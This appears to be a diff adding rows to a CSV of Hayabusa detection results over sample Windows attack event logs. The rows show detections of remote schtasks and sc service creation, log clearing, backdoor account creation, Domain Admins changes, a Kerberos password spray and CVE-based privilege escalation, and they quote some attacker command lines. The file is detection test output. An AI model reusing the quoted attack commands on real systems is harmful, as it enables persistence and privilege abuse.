+2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 06:09:03.249 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx
+2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
+2020-07-12 06:46:39.786 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx
+2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
+2020-07-12 06:50:07.213 +09:00,fs02.offsec.lan,7045,info,,New Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
+2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx
+2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx
+2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx
+2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx
+2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx
+2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
+2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
+2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group01 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group02 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
+2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Local Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
+2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
+2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
+2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx
+2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx
+2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
+2020-07-25 02:20:29.872 +09:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx
+2020-07-27 07:26:14.522 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 747F3D96-F938-5F1D-0000-00104B500000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-F935-5F1D-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
+2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
+2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
+2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
